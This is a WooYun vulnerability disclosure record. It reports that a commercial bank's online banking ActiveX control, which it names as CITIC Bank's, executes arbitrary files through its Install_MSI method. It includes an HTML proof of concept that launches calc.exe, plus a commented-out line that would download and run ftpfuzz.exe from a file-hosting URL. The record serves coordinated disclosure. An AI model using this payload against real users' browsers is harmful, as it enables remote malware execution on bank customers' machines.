漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-061758
漏洞标题:某商业银行网银伴侣v2.0.0.0.0.activex任意文件执行漏洞
相关厂商:某商业银行
漏洞作者: cloud4986
提交时间:2014-05-21 19:16
修复时间:2014-07-05 19:17
公开时间:2014-07-05 19:17
漏洞类型:命令执行
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-21: 细节已通知厂商并且等待厂商处理中
2014-05-26: 厂商已经确认,细节仅向厂商公开
2014-06-05: 细节向核心白帽子及相关领域专家公开
2014-06-15: 细节向普通白帽子公开
2014-06-25: 细节向实习白帽子公开
2014-07-05: 细节向公众公开
简要描述:
漏洞名称:某商业银行网银伴侣v2.0.0.0.activex任意文件执行漏洞
影响版本:某商业银行网银伴侣v2.0.0.0
验证环境:winxp\win7中文版sp1中文,ie6.0-ie8.0)
问题文件:CMailCOM.dll
问题描述:某商业银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。
详细说明:
中信银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。其中如果“//”注释部分是远程下载ftpfuzz并允许的代码
POC代码:
<html>
<body>
<object classid='clsid:A38F2B9A-2DD3-4C88-86EE-15C01EB565EA' id='target' /></object>
<script>
var str = '';
str = str +'C:\\WINDOWS\\System32\\calc.exe';
//"http://bj.baidupcs.com/file/8afe498c9f126015a70ae0c3ce1a9b63?fid=3675168192-250528-678972838405721&time=1400665296&sign=FDTAXER-DCb740ccc5511e5e8fedcff06b081203-MfWZ2p8aIRiyTWAdPJp9n8qZ9fU%3D&to=bb&fm=N,B,U,nc&newver=1&expires=1400665896&rt=sh&r=805615569&logid=841455764&sh=1&vuk=3675168192&fn=ftpfuzz.exe" ;
target.Install_MSI(str);
</script>
</body>
</html>
漏洞证明:
修复方案:
版权声明:转载请注明来源 cloud4986@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-05-26 14:13
厂商回复:
CNVD确认并复现所述情况,转由CNCERT向网站管理单位通报。
最新状态:
暂无